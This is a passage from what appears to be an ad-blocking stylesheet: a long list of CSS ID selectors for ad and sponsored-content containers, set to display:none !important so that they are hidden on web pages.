acer,#adSpecial,#adSplotlightEm,#adSpot-Leader,#adSpot-banner,#adSpot-island,#adSpot-mrec1,#adSpot-sponsoredlinks,#adSpot-textbox1,#adSpot-widestrip,#adSpotAdvertorial,#adSpotIsland,#adSpotSponsoredLinks,#adSquare,#adStaticA,#adStrip,#adSuperAd,#adSuperPremiere,#adSuperSkyscraper,#adSuperbanner,#adTableCell,#adTag1,#adTag2,#adText,#adTextCustom,#adTextLink,#adText_container,#adTile,#adTop,#adTopContent,#adTopbanner,#adTopboxright,#adTower,#adUnit,#adWrapper,#adZoneTop,#ad_1,#ad_130x250_inhouse,#ad_160x160,#ad_160x600,#ad_190x90,#ad_2,#ad_3,#ad_300,#ad_300_250,#ad_300_250_1,#ad_300a,#ad_300b,#ad_300c,#ad_300x100_m_c,#ad_300x250,#ad_300x250_content_column,#ad_300x250_m_c,#ad_300x250m,#ad_300x90,#ad_4,#ad_468_60,#ad_468x60,#ad_5,#ad_728_foot,#ad_728x90,#ad_728x90_container,#ad_940,#ad_984,#ad_A,#ad_B,#ad_Banner,#ad_C,#ad_C2,#ad_D,#ad_E,#ad_F,#ad_G,#ad_H,#ad_I,#ad_J,#ad_K,#ad_L,#ad_M,#ad_N,#ad_O,#ad_P,#ad_YieldManager-300x250,#ad_YieldManager-728x90,#ad_adsense,#ad_after_navbar,#ad_anchor,#ad_area,#ad_banner,#ad_bannerManage_1,#ad_banner_top,#ad_banners,#ad_bar,#ad_bellow_post,#ad_bigsize_wrapper,#ad_block_1,#ad_block_2,#ad_bottom,#ad_box,#ad_box_colspan,#ad_box_top,#ad_branding,#ad_bs_area,#ad_buttons,#ad_center_monster,#ad_circ300x250,#ad_cna2,#ad_cont,#ad_container,#ad_container_0,#ad_container_marginal,#ad_container_side,#ad_container_sidebar,#ad_container_top,#ad_content_top,#ad_content_wrap,#ad_feature,#ad_firstpost,#ad_footer,#ad_frame,#ad_front_three,#ad_fullbanner,#ad_gallery,#ad_global_header,#ad_h3,#ad_haha_1,#ad_haha_4,#ad_halfpage,#ad_head,#ad_header,#ad_holder,#ad_horizontal,#ad_horseshoe_left,#ad_horseshoe_right,#ad_horseshoe_spacer,#ad_horseshoe_top,#ad_hotpots,#ad_in_arti,#ad_island,#ad_label,#ad_large_rectangular,#ad_lastpost,#ad_layer,#ad_layer2,#ad_leader,#ad_leaderBoard,#ad_leaderboard,#ad_leaderboard728x90,#ad_leaderboard_top,#ad_left,#ad_lnk,#ad_lrec,#ad_lwr_square,#ad_main,#ad_medium_rectangle,#ad_medium_rectangular,#ad_mediumrectangle,#ad_menu_header,#ad_message,#ad_middle,#ad_most_pop_234x60_req_wrapper,#ad_mpu,#ad_mpu300x250,#ad_mpuav,#ad_mrcontent,#ad_newsletter,#ad_overlay,#ad_place,#ad_play_300,#ad_rect,#ad_rect_body,#ad_rect_bottom,#ad_rectangle,#ad_rectangle_medium,#ad_related_links_div,#ad_related_links_div_program,#ad_replace_div_0,#ad_replace_div_1,#ad_report_leaderboard,#ad_report_rectangle,#ad_results,#ad_right,#ad_right_main,#ad_ros_tower,#ad_rr_1,#ad_script_head,#ad_sec,#ad_sec_div,#ad_sgd,#ad_sidebar,#ad_sidebar1,#ad_sidebar2,#ad_sidebar3,#ad_sky,#ad_skyscraper,#ad_skyscraper160x600,#ad_skyscraper_text,#ad_slot_leaderboard,#ad_slot_livesky,#ad_slot_sky_top,#ad_space,#ad_square,#ad_ss,#ad_table,#ad_term_bottom_place,#ad_text:not(textarea),#ad_thread_first_post_content,#ad_top,#ad_top_holder,#ad_tp_banner_1,#ad_tp_banner_2,#ad_txt,#ad_unit,#ad_vertical,#ad_wide,#ad_wide_box,#ad_widget,#ad_window,#ad_wrap,#ad_wrapper,#adaptvcompanion,#adbForum,#adbanner,#adbar,#adbig,#adbnr,#adboard,#adbody,#adbottom,#adbox,#adbox1,#adbox2,#adbutton,#adclear,#adcode,#adcode1,#adcode2,#adcode3,#adcode4,#adcolumnwrapper,#adcontainer,#adcontainer1,#adcontainerRight,#adcontainsm,#adcontent,#adcontent1,#adcontrolPushSite,#add_ciao2,#addbottomleft,#addiv-bottom,#addiv-top,#adfooter,#adfooter_728x90,#adframe:not(frameset),#adhead,#adhead_g,#adheader,#adhome,#adiframe1_iframe,#adiframe2_iframe,#adiframe3_iframe,#adimg,#adition_content_ad,#adlabel,#adlabelFooter,#adlayer,#adlayerContainer,#adlayer_back,#adlayerad,#adleaderboard,#adleaderboard_flex,#adleaderboardb,#adleaderboardb_flex,#adleft,#adlinks,#adlinkws,#adlrec,#admanager_leaderboard,#admid,#admiddle3center,#admiddle3left,#adposition,#adposition-C,#adposition-FPMM,#adposition1,#adposition2,#adposition3,#adposition4,#adrectangle,#adrectanglea,#adrectanglea_flex,#adrectangleb,#adrectangleb_flex,#adrig,#adright,#adright2,#adrighthome,#ads-250,#ads-468,#ads-area,#ads-block,#ads-bot,#ads-bottom,#ads-col,#ads-dell,#ads-footer,#ads-footer-inner,#ads-horizontal,#ads-indextext,#ads-leaderboard1,#ads-lrec,#ads-main,#ads-menu,#ads-middle,#ads-prices,#ads-rhs,#ads-right,#ads-sponsored-boxes,#ads-top,#ads-vers7,#ads-wrapper,#ads120,#ads125,#ads160left,#ads300,#ads300-250,#ads300Bottom,#ads300Top,#ads315,#ads336x280,#ads728,#ads728bottom,#ads728top,#ads790,#adsBox-460_left,#adsBox-dynamic-right,#adsBoxResultsPage,#adsContent,#adsDisplay,#adsDiv1,#adsDiv2,#adsDiv3,#adsDiv4,#adsDiv5,#adsDiv6,#adsDiv7,#adsHeader,#adsID,#ads_160,#ads_300,#ads_728,#ads_banner,#ads_belowforumlist,#ads_belownav,#ads_bottom,#ads_bottom_inner,#ads_bottom_outer,#ads_box,#ads_button,#ads_catDiv,#ads_container,#ads_footer,#ads_fullsize,#ads_halfsize,#ads_header,#ads_html1,#ads_html2,#ads_inner,#ads_lb,#ads_medrect,#ads_notice,#ads_right,#ads_right_sidebar,#ads_sidebar_roadblock,#ads_space,#ads_text,#ads_top,#ads_topbanner,#ads_watch_top_square,#ads_zone27,#adsbottom,#adsbox,#adsbox-left,#adsbox-right,#adscolumn,#adsd_contentad_r1,#adsd_contentad_r2,#adsd_contentad_r3,#adsd_topbanner,#adsd_txt_sky,#adsdiv,#adsection,#adsense,#adsense-2,#adsense-header,#adsense-new,#adsense-tag,#adsense-text,#adsense03,#adsense04,#adsense05,#adsense1,#adsenseLeft,#adsenseOne,#adsenseWrap,#adsense_article_left,#adsense_block,#adsense_box,#adsense_box_video,#adsense_inline,#adsense_leaderboard,#adsense_overlay,#adsense_placeholder_2,#adsenseheader,#adsensetopplay,#adsensewidget-3,#adserv,#adshometop,#adsimage,#adskinlink,#adsky,#adskyscraper,#adslider,#adslot,#adsmiddle,#adsonar,#adspace,#adspace-1,#adspace-300x250,#adspace-leaderboard-top,#adspace300x250,#adspaceBox,#adspaceBox300,#adspace_header,#adspace_leaderboard,#adspacer,#adsponsorImg,#adspot,#adspot-1,#adspot-149x170,#adspot-1x4,#adspot-2,#adspot-295x60,#adspot-2a,#adspot-2b,#adspot-300x110-pos-1,#adspot-300x125,#adspot-300x250-pos-1,#adspot-300x250-pos-2,#adspot-468x60-pos-2,#adspot-a,#adspot300x250,#adspot_220x90,#adspot_300x250,#adspot_468x60,#adspot_728x90,#adsquare,#adsright,#adstop,#adtab,#adtag_right_side,#adtagfooter,#adtagheader,#adtagrightcol,#adtaily-widget-light,#adtech_0,#adtech_1,#adtech_2,#adtech_3,#adtech_googleslot_03c,#adtech_takeover,#adtext,#adtop,#adtophp,#adtxt,#adv-300,#adv-leaderboard,#adv-left,#adv-masthead,#adv-middle,#adv-mpux,#adv-x36,#adv-x37,#adv-x38,#adv-x39,#adv-x40,#adv1,#adv300bottom { display:none !important; } #adv300top,#adv728,#adv_300,#adv_728,#adv_border,#adv_google_300,#adv_google_728,#adv_halfpage,#adv_halfpage_title,#adv_leaderboard,#adv_sky,#adv_top_banner_wrapper,#adver1,#adver2,#adver3,#adver4,#adver5,#adver6,#adver7,#advert-1,#advert-120,#advert-boomer,#advert-display,#advert-header,#advert-leaderboard,#advert-links-bottom,#advert-skyscraper,#advert-top,#advert1,#advertBanner,#advertContainer,#advertDB,#advertRight,#advertSection,#advert_125x125,#advert_250x250,#advert_box,#advert_home01,#advert_leaderboard,#advert_lrec_format,#advert_mid,#advert_mpu,#advert_mpu_1,#advert_right_skyscraper,#advert_sky,#advertbox,#advertbox2,#advertbox3,#advertbox4,#adverthome,#advertise,#advertise-here,#advertise-here-sidebar,#advertise-now,#advertise1,#advertiseHere,#advertisement1,#advertisement160x600,#advertisement3,#advertisement728x90,#advertisementHorizontal,#advertisementLigatus,#advertisementPrio2,#advertisementRight,#advertisementRightcolumn0,#advertisementRightcolumn1,#advertisementsarticle,#advertiser-container,#advertiserLinks,#advertisers,#advertising,#advertising-banner,#advertising-caption,#advertising-container,#advertising-control,#advertising-skyscraper,#advertising-top,#advertising2,#advertisingModule160x600,#advertisingModule728x90,#advertisingTopWrapper,#advertising_btm,#advertising_contentad,#advertising_horiz_cont,#advertisment,#advertismentElementInUniversalbox,#advertorial,#advertorial_red_listblock,#adverts,#adverts-top-container,#adverts-top-left,#adverts-top-middle,#adverts-top-right,#advertsingle,#advertspace,#advheader,#advsingle,#advt,#advtext,#advtop,#adwhitepaperwidget,#adwin_rec,#adwith,#adwords-4-container,#adwrapper,#adxBigAd,#adxMiddle5,#adxSponLink,#adxSponLinkA,#adxtop,#adxtop2,#adzbanner,#adzerk,#adzerk1,#adzerk2,#adzone,#adzoneBANNER,#adzoneheader,#afc-container,#affinityBannerAd,#after-content-ads,#after-header-ad-left,#after-header-ad-right,#after-header-ads,#agi-ad300x250,#agi-ad300x250overlay,#agi-sponsored,#alert_ads,#anchorAd,#annoying_ad,#ap_adframe,#ap_cu_overlay,#ap_cu_wrapper,#apiBackgroundAd,#apiTopAdWrap,#apmNADiv,#apolload,#araHealthSponsorAd,#area-adcenter,#area1ads,#article-ad,#article-ad-container,#article-box-ad,#articleAdReplacement,#articleLeftAdColumn,#articleSideAd,#article_ad,#article_ad_container,#article_box_ad,#articlead1,#articlead2,#asideads,#asinglead,#atlasAdDivGame,#awds-nt1-ad,#babAdTop,#banner-300x250,#banner-ad,#banner-ad-container,#banner-ads,#banner250x250,#banner300x250,#banner468x60,#banner728x90,#bannerAd,#bannerAdTop,#bannerAdWrapper,#bannerAd_ctr,#bannerAd_rdr,#banner_160x600,#banner_300_250,#banner_ad,#banner_ad_footer,#banner_ad_module,#banner_admicro,#banner_ads,#banner_advertisement,#banner_content_ad,#banner_topad,#bannerad,#bannerad2,#baseAdvertising,#basket-adContainer,#bbccom_mpu,#bbo_ad1,#bg-footer-ads,#bg-footer-ads2,#bg_YieldManager-160x600,#bg_YieldManager-300x250,#bg_YieldManager-728x90,#bigAd,#bigBoxAd,#bigad300outer,#bigadbox,#bigadframe,#bigadspot,#billboard_ad,#block-ad_cube-1,#block-openads-0,#block-openads-1,#block-openads-2,#block-openads-3,#block-openads-4,#block-openads-5,#block-spti_ga-spti_ga_adwords,#block-thewrap_ads_250x300-0,#block_advert,#block_advertisement,#blog-ad,#blog_ad_content,#blog_ad_opa,#blog_ad_right,#blog_ad_top,#blox-big-ad,#blox-big-ad-bottom,#blox-big-ad-top,#blox-halfpage-ad,#blox-tile-ad,#blox-tower-ad,#body_728_ad,#book-ad,#botad,#bott_ad2,#bott_ad2_300,#bottom-ad,#bottom-ad-container,#bottom-ad-tray,#bottom-ad-wrapper,#bottom-ads,#bottomAd,#bottomAdCCBucket,#bottomAdContainer,#bottomAdSense,#bottomAdSenseDiv,#bottomAds,#bottomAdvBox,#bottomContentAd,#bottomRightAd,#bottomRightAdSpace,#bottom_ad,#bottom_ad_area,#bottom_ad_unit,#bottom_ads,#bottom_banner_ad,#bottom_overture,#bottom_sponsor_ads,#bottom_sponsored_links,#bottom_text_ad,#bottomad,#bottomads,#bottomadsense,#bottomadwrapper,#bottomleaderboardad,#box-ad-section,#box-ads-small-1,#box-ads-small-2,#box-content-ad,#box-googleadsense-1,#box-googleadsense-r,#box1ad,#boxAd300,#boxAdContainer,#boxAdvert,#box_ad,#box_advertisment,#box_mod_googleadsense,#boxad1,#boxad2,#boxad3,#boxad4,#boxad5,#boxads,#bpAd,#bps-header-ad-container,#btnAds,#btnads,#btr_horiz_ad,#burn_header_ad,#button-ads-horizontal,#button-ads-vertical,#buttonAdWrapper1,#buttonAdWrapper2,#buttonAds,#buttonAdsContainer,#button_ad_container,#button_ad_wrap,#button_ads,#buttonad,#buy-sell-ads,#c4ad-Middle1,#c_ad_sb,#c_ad_sky,#caAdLarger,#catad,#category-ad,#cellAd,#channel_ad,#channel_ads,#ciHomeRHSAdslot,#circ_ad,#closeable-ad,#cmn_ad_box,#cmn_toolbar_ad,#cnnAboveFoldBelowAd,#cnnRR336ad,#cnnSponsoredPods,#cnnTopAd,#cnnVPAd,#col3_advertising,#colAd,#colRightAd,#collapseobj_adsection,#column4-google-ads,#comments-ad-container,#commercial_ads,#common_right_ad_wrapper,#common_right_lower_ad_wrapper,#common_right_lower_adspace,#common_right_lower_player_ad_wrapper,#common_right_lower_player_adspace,#common_right_player_ad_wrapper,#common_right_player_adspace,#common_right_right_adspace,#common_top_adspace,#comp_AdsLeaderboardTop,#companion-ad,#companionAd,#companionAdDiv,#companionad,#container-righttopads,#container-topleftads,#containerLocalAds,#containerLocalAdsInner,#containerMrecAd,#containerSqAd,#content-ad-header,#content-header-ad,#content-left-ad,#content-right-ad,#contentAd,#contentBoxad,#contentTopAds2,#content_ad,#content_ad_square,#content_ad_top,#content_ads_content,#content_box_300body_sponsoredoffers,#content_box_adright300_google,#content_lower_center_right_ad,#content_mpu,#contentad,#contentad_imtext,#contentad_right,#contentads,#contentinlineAd,#contents_post_ad,#contextad,#contextual-ads,#contextual-ads-block,#contextualad,#coverADS,#coverads,#ctl00_Adspace_Top_Height,#ctl00_BottomAd,#ctl00_ContentMain_BanManAd468_BanManAd,#ctl00_ContentPlaceHolder1_blockAdd_divAdvert,#ctl00_ContentRightColumn_RightColumn_Ad1_BanManAd,#ctl00_ContentRightColumn_RightColumn_Ad2_BanManAd,#ctl00_ContentRightColumn_RightColumn_PremiumAd1_ucBanMan_BanManAd,#ctl00_LHTowerAd,#ctl00_LeftHandAd,#ctl00_MasterHolder_IBanner_adHolder,#ctl00_TopAd,#ctl00_TowerAd,#ctl00_VBanner_adHolder,#ctl00__Content__RepeaterReplies_ctl03__AdReply,#ctl00_abot_bb,#ctl00_adFooter,#ctl00_advert_LargeMPU_div_AdPlaceHolder,#ctl00_atop_bt,#ctl00_cphMain_hlAd1,#ctl00_cphMain_hlAd2,#ctl00_cphMain_hlAd3,#ctl00_ctl00_MainPlaceHolder_itvAdSkyscraper,#ctl00_ctl00_ctl00_Main_Main_PlaceHolderGoogleTopBanner_MPTopBannerAd,#ctl00_ctl00_ctl00_Main_Main_SideBar_MPSideAd,#ctl00_dlTilesAds,#ctl00_m_skinTracker_m_adLBL,#ctl00_phCrackerMain_ucAffiliateAdvertDisplayMiddle_pnlAffiliateAdvert,#ctl00_phCrackerMain_ucAffiliateAdvertDisplayRight_pnlAffiliateAdvert,#ctl00_topAd,#ctrlsponsored,#cubeAd,#cube_ads,#cube_ads_inner,#cubead,#cubead-2,#currencies-sponsored-by,#custom-advert-leadboard-spacer,#dAdverts,#dItemBox_ads,#dart_160x600,#dc-display-right-ad-1,#dcadSpot-Leader,#dcadSpot-LeaderFooter,#dcol-sponsored,#defer-adright,#detail_page_vid_topads,#div-gpt-ad-1,#div-gpt-ad-2,#div-gpt-ad-3,#div-gpt-ad-4,#divAd,#divAdBox,#divAdWrapper,#divAdvertisement,#divBottomad1,#divBottomad2,#divDoubleAd,#divLeftAd12,#divLeftRecAd,#divMenuAds,#divWNAdHeader,#divWrapper_Ad,#div_ad_leaderboard,#div_video_ads,#dlads,#dni-header-ad,#dnn_adLeaderBoard2008,#dnn_ad_banner,#download_ads,#dp_ads1,#ds-mpu,#ds_ad_north_leaderboard,#editorsmpu,#em_ad_superbanner,#embedded-ad,#evotopTen_advert,#ex-ligatus,#exads,#extra-search-ads,#fb_adbox,#fb_rightadpanel,#featAds,#featuread,#featured-advertisements,#featuredAdContainer2,#featuredAds,#featured_ad_links,#feed_links_ad_container,#file_sponsored_link,#first-300-ad,#first-adlayer,#first_ad_unit,#firstad,#flAdData6,#fl_hdrAd,#flash_ads_1,#flexiad,#floatingAd,#floating_ad_container,#foot-ad-1,#footad,#footer-ad,#footer-ads,#footer-advert,#footer-adverts,#footer-sponsored,#footerAd,#footerAdDiv,#footerAds,#footerAdvertisement,#footerAdverts,#footer_ad,#footer_ad_01,#footer_ad_block,#footer_ad_container,#footer_ad_modules,#footer_ads,#footer_adspace,#footer_text_ad,#footerad,#footerads,#footeradsbox,#forum_top_ad,#four_ads,#fpad1,#fpad2,#fpv_companionad,#fr_ad_center,#frame_admain,#frnAdSky,#frnBannerAd,#frnContentAd,#front_ad728,#front_advert,#front_mpu,#ft-ad,#ft-ad-1,#ft-ad-container,#ft_mpu,#fullsizebanner_468x60,#fusionad,#fw-advertisement,#g_ad,#g_adsense,#ga_300x250,#galleries-tower-ad,#gallery-ad,#gallery-ad-m0,#gallery-random-ad,#gallery_ads,#game-info-ad,#gamead,#gameads,#gasense,#gglads,#global_header_ad_area,#gm-ad-lrec,#gmi-ResourcePageAd,#gmi-ResourcePageLowerAd,#goad1,#goads,#gooadtop,#google-ad,#google-ad-art,#google-ad-table-right,#google-ad-tower,#google-ads,#google-ads-bottom,#google-ads-header,#google-ads-left-side,#google-adsense-mpusize,#googleAd,#googleAdArea,#googleAds,#googleAdsSml,#googleAdsense,#googleAdsenseBanner,#googleAdsenseBannerBlog,#googleAdwordsModule,#googleAfcContainer,#googleSearchAds,#googleShoppingAdsRight,#googleShoppingAdsTop,#googleSubAds,#google_ad,#google_ad_container,#google_ad_inline,#google_ad_test,#google_ads,#google_ads_aCol,#google_ads_frame1,#google_ads_frame1_anchor,#google_ads_frame2,#google_ads_frame2_anchor,#google_ads_frame3,#google_ads_frame3_anchor,#google_ads_test,#google_ads_top,#google_adsense_home_468x60_1,#googlead,#googlead-sidebar-middle,#googlead-sidebar-top,#googlead2,#googleadbox,#googleads,#googleads_mpu_injection,#googleadsense,#googlesponsor,#gpt-ad-halfpage,#gpt-ad-rectangle1,#gpt-ad-rectangle2,#gpt-ad-skyscraper,#gpt-ad-story_rectangle3,#grid_ad,#gsyadrectangleload,#gsyadrightload,#gsyadtop,#gsyadtopload,#gtopadvts,#half-page-ad,#halfPageAd,#halfe-page-ad-box,#hd-ads,#hd-banner-ad,#hdtv_ad_ss,#head-ad,#head-ad-1,#head-banner468,#headAd,#head_ad,#head_advert,#headad,#header-ad,#header-ad-left,#header-ad-rectangle-container,#header-ad-right,#header-ad2010,#header-ads,#header-adspace,#header-advert,#header-advertisement,#header-advertising,#header-adverts,#header-banner-ad,#headerAd,#headerAdBackground,#headerAdContainer,#headerAdWrap,#headerAds,#headerAdsWrapper,#headerTopAd,#header_ad,#header_ad_728_90,#header_ad_container,#header_adcode,#header_ads,#header_advertisement_top,#header_flag_ad,#header_leaderboard_ad_container,#header_publicidad,#headerad,#headeradbox,#headerads,#headeradsbox,#headeradvertholder,#headeradwrap,#headline_ad,#headlinesAdBlock,#hiddenadAC,#hideads,#hl-sponsored-results,#hly_ad_side_bar_tower_left,#hly_inner_page_google_ad,#home-advert-module,#home-rectangle-ad,#home-top-ads,#homeMPU,#homeTopRightAd,#home_ad,#home_bottom_ad,#home_contentad,#home_feature_ad,#home_lower_center_right_ad,#home_mpu,#home_spensoredlinks,#homead,#homepage-ad,#homepageAdsTop,#homepageFooterAd,#homepage_right_ad,#homepage_right_ad_container,#homepage_top_ads,#hometop_234x60ad,#hor_ad,#horizad,#horizontal-banner-ad,#horizontal_ad,#horizontal_ad_top,#horizontalads,#hot-deals-ad,#houseAd,#hp-header-ad,#hp-mpu,#hp-right-ad,#hp-store-ad,#hpV2_300x250Ad,#hpV2_googAds,#hp_ad300x250,#ibt_local_ad728,#icePage_SearchLinks_AdRightDiv,#icePage_SearchLinks_DownloadToolbarAdRightDiv,#icePage_SearchResults_ads0_SponsoredLink,#icePage_SearchResults_ads1_SponsoredLink,#icePage_SearchResults_ads2_SponsoredLink,#icePage_SearchResults_ads3_SponsoredLink,#icePage_SearchResults_ads4_SponsoredLink,#idSponsoredresultend,#idSponsoredresultstart,#iframeRightAd,#iframeTopAd,#imu_ad_module,#in_serp_ad,#inadspace,#indexad,#inline-story-ad,#inlineAd,#inlinead,#inlinegoogleads,#inlist-ad-block,#inner-advert-row,#inner-top-ads,#innerpage-ad,#inside-page-ad,#insider_ad_wrapper,#instoryad,#instoryadtext,#instoryadwrap,#int-ad,#interstitial_ad_wrapper,#iqadtile8,#islandAd,#j_ad,#ji_medShowAdBox,#jmp-ad-buttons,#joead,#joead2,#js_adsense,#ka_adRightSkyscraperWide,#ka_samplead,#kaufDA-widget,#kdz_ad1,#kdz_ad2,#keyadvertcontainer,#landing-adserver,#lapho-top-ad-1,#largead,#lateAd,#layerAds_layerDiv,#layerTLDADSERV,#layer_ad_content,#layer_ad_main,#layerad,#leader-board-ad,#leaderAd,#leaderAdContainer,#leader_ad,#leader_board_ad,#leaderad,#leaderad_section,#leaderboard-ad,#leaderboard-bottom-ad,#leaderboardAd,#leaderboard_ad,#leaderboard_ad_gam,#left-ad-1,#left-ad-2,#left-ad-col,#left-ad-skin,#left-bottom-ad,#left-lower-adverts,#left-lower-adverts-container,#leftAdContainer,#leftAd_rdr,#leftAdvert,#leftSectionAd300-100,#left_ad,#left_adspace,#leftad,#leftads,#leftcolAd,#lg-banner-ad,#ligatus,#linkAds,#linkads,#live-ad,#localAds,#logoAd,#longAdSpace,#long_advertisement,#lowerAdvertisementImg,#lower_ad,#lowerads,#lowerthirdad,#lowertop-adverts,#lowertop-adverts-container,#lpAdPanel,#lrecad,#lsadvert-left_menu_1,#lsadvert-left_menu_2,#lsadvert-top,#mBannerAd,#main-ad,#main-ad160x600,#main-ad160x600-img,#main-ad728x90,#main-advert1,#main-advert2,#main-advert3,#main-bottom-ad,#main-tj-ad,#mainAd,#mainAdUnit,#mainAdvert,#mainAdvertismentP,#mainHeaderAdvertisment,#main_ad,#main_rec_ad,#main_top_ad_container,#marketing-promo,#mastAd,#mastAdvert,#mastad,#mastercardAd,#masthead_ad,#masthead_topad,#medRecAd,#media_ad,#mediaplayer_adburner,#mediumAdvertisement,#medrectad,#menuAds,#menubanner-ad-content,#mi_story_assets_ad,#mid-ad300x250,#mid-table-ad,#midRightTextAds,#mid_ad_div,#mid_ad_title,#mid_mpu,#midadd,#midadspace,#middle-ad,#middle_ad,#middle_body_advertising,#middlead,#middleads,#midrect_ad,#midstrip_ad,#mini-ad,#mochila-column-right-ad-300x250,#mochila-column-right-ad-300x250-1,#module-google_ads,#module_ad,#module_box_ad,#module_sky_scraper,#monsterAd,#moogleAd,#moreads,#most_popular_ad,#motionAd,#mpu-advert,#mpu-cont,#mpu300250,#mpuAd,#mpuDiv,#mpuSlot,#mpuWrapper,#mpuWrapperAd,#mpu_banner,#mpu_firstpost,#mpu_holder,#mpu_text_ad,#mpuad,#mpubox,#mr_banner_topad,#mrecAdContainer,#msAds,#ms_ad,#msad,#multiLinkAdContainer,#multi_ad,#my-ads,#myads_HeaderButton,#n_sponsor_ads,#namecom_ad_hosting_main,#narrow-ad,#narrow_ad_unit,#natadad300x250,#national_microlink_ads,#nationalad,#navi_banner_ad_780,#nba160PromoAd,#nba300Ad,#nbaGI300ad,#nbaHouseAnd600Ad,#nbaLeft600Ad,#nbaMidAds,#nbaVid300Ad,#nbcAd300x250,#new_topad,#newads,#news_advertorial_content,#news_advertorial_top,#ng_rtcol_ad,#noresults_ad_container,#noresultsads,#northad,#northbanner-advert,#northbanner-advert-container,#ns_ad1,#ns_ad2,#ns_ad3,#oanda_ads,#onespot-ads,#online_ad,#ovadsense,#p-googleadsense,#page-header-ad,#page-top-ad,#pageAds,#pageAdsDiv,#pageBannerAd,#page_ad,#page_content_top_ad,#pagelet_adbox,#pagelet_netego_ads,#pagelet_search_ads2,#panelAd,#pb_report_ad,#pcworldAdBottom,#pcworldAdTop,#pinball_ad,#player-below-advert,#player_ad,#player_ads,#pmad-in1,#pod-ad-video-page,#populate_ad_bottom,#populate_ad_left,#popup_domination_lightbox_wrapper,#portlet-advertisement-left,#portlet-advertisement-right,#post-promo-ad,#post5_adbox,#post_ad,#premium_ad,#priceGrabberAd,#prime-ad-space,#print-header-ad,#print_ads,#printads,#product-adsense,#promo-ad,#promoAds,#ps-vertical-ads,#pub468x60,#publicidad,#pushdown_ad,#qm-ad-big-box,#qm-ad-sky,#qm-dvdad,#quigo_ad,#r1SoftAd,#rail_ad1,#rail_ad2,#realEstateAds,#rectAd,#rect_ad,#rectangle-ad,#rectangleAd,#rectangle_ad,#refine-300-ad,#region-node-advert,#region-top-ad,#relocation_ad_container,#rh-ad-container,#rh_tower_ad,#rhapsodyAd,#rhs_ads,#rhsadvert,#right-ad,#right-ad-col,#right-ad-skin,#right-ad-title,#right-ad1,#right-ads-3,#right-advert,#right-bar-ad,#right-box-ad,#right-featured-ad,#right-mpu-1-ad-container,#right-uppder-adverts,#right-uppder-adverts-container,#rightAd,#rightAd300x250,#rightAd300x250Lower,#rightAdBar,#rightAdColumn,#rightAd_rdr,#rightAdsDiv,#rightColAd,#rightColumnMpuAd,#rightColumnSkyAd,#right_ad,#right_ad_wrapper,#right_ads,#right_advert,#right_advertisement,#right_advertising,#right_column_ad_container,#right_column_ads,#right_column_adverts,#right_column_internal_ad_container,#right_column_top_ad_unit,#rightad,#rightadContainer,#rightads,#rightadvertbar-doubleclickads,#rightbar-ad,#rightcolhouseads,#rightcolumn_300x250ad,#rightgoogleads,#rightinfoad,#rightside-ads,#rightside_ad,#righttop-adverts,#righttop-adverts-container,#rm_ad_text { display:none !important; } #ros_ad,#rotatingads,#row2AdContainer,#rprightHeaderAd,#rr_MSads,#rt-ad,#rt-ad-top,#rt-ad468,#rtMod_ad,#rtmod_ad,#sAdsBox,#sb-ad-sq,#sb_ad_links,#sb_advert,#search-google-ads,#search-sponsored-links,#search-sponsored-links-top,#searchAdSenseBox,#searchAdSenseBoxAd,#searchAdSkyscraperBox,#search_ads,#search_result_ad,#sec_adspace,#second-adlayer,#secondBoxAdContainer,#secondrowads,#sect-ad-300x100,#sect-ad-300x250-2,#section-ad-1-728,#section-ad-300-250,#section-ad-4-160,#section-blog-ad,#section-container-ddc_ads,#section_advertisements,#section_advertorial_feature,#servfail-ads,#sew-ad1,#shoppingads,#shortads,#show-ad,#showAd,#showad,#side-ad,#side-ad-container,#side-ads,#sideAd,#sideAd1,#sideAd2,#sideAdSub,#sideAds,#sideBarAd,#side_ad,#side_ad_wrapper,#side_ads_by_google,#side_sky_ad,#sidead,#sideads,#sideadtop-to,#sidebar-125x125-ads,#sidebar-125x125-ads-below-index,#sidebar-ad,#sidebar-ad-boxes,#sidebar-ad-space,#sidebar-ad-wrap,#sidebar-ad3,#sidebar-ads,#sidebar-adv,#sidebar-sponsor-link,#sidebar2ads,#sidebar_ad,#sidebar_ad_widget,#sidebar_ads,#sidebar_ads_180,#sidebar_sponsoredresult_body,#sidebar_txt_ad_links,#sidebarad,#sidebaradpane,#sidebarads,#sidebaradver_advertistxt,#sideline-ad,#single-mpu,#singlead,#site-ad-container,#site-leaderboard-ads,#site_top_ad,#sitead,#sky-ad,#skyAd,#skyAdContainer,#skyScrapperAd,#skyWrapperAds,#sky_ad,#sky_advert,#skyads,#skyadwrap,#skyline_ad,#skyscrapeAd,#skyscraper-ad,#skyscraperAd,#skyscraperAdContainer,#skyscraper_ad,#skyscraper_advert,#skyscraperad,#slide_ad,#sliderAdHolder,#slideshow_ad_300x250,#sm-banner-ad,#small_ad,#small_ad_banners_vertical,#small_ads,#smallerAd,#some-ads,#some-more-ads,#specialAd_one,#specialAd_two,#specialadvertisingreport_container,#specials_ads,#speeds_ads,#speeds_ads_fstitem,#speedtest_mrec_ad,#sphereAd,#spnAds,#sponlink,#sponlinks,#sponsAds,#sponsLinks,#sponseredlinks,#sponsorAd1,#sponsorAd2,#sponsorAdDiv,#sponsorLinks,#sponsorTextLink,#sponsor_banderole,#sponsor_deals,#sponsored,#sponsored-ads,#sponsored-features,#sponsored-links,#sponsored-listings,#sponsored-resources,#sponsored1,#sponsoredBox1,#sponsoredBox2,#sponsoredLinks,#sponsoredLinks_Top,#sponsoredList,#sponsoredResults,#sponsoredResultsWide,#sponsoredSiteMainline,#sponsoredSiteSidebar,#sponsored_ads_v4,#sponsored_container,#sponsored_content,#sponsored_game_row_listing,#sponsored_head,#sponsored_link,#sponsored_link_bottom,#sponsored_links,#sponsored_v12,#sponsoredads,#sponsoredlinks,#sponsoredlinks_cntr,#sponsoredlinkslabel,#sponsoredresults_top,#sponsoredwellcontainerbottom,#sponsoredwellcontainertop,#sponsorlink,#spotlightAds,#spotlightad,#sqAd,#squareAd,#squareAdSpace,#squareAds,#square_ad,#srp_adsense-top,#start_middle_container_advertisment,#sticky-ad,#stickyBottomAd,#story-90-728-area,#story-ad-a,#story-ad-b,#story-leaderboard-ad,#story-sponsoredlinks,#storyAd,#storyAdWrap,#storyad2,#submenu-ads,#subpage-ad-right,#subpage-ad-top,#swads,#synch-ad,#systemad_background,#tabAdvertising,#takeoverad,#tblAd,#tbl_googlead,#tcwAd,#td-GblHdrAds,#template_ad_leaderboard,#tertiary_advertising,#test_adunit_160_article,#text-ad,#text-ads,#text-link-ads,#textAd,#textAds,#text_ad,#text_ads,#text_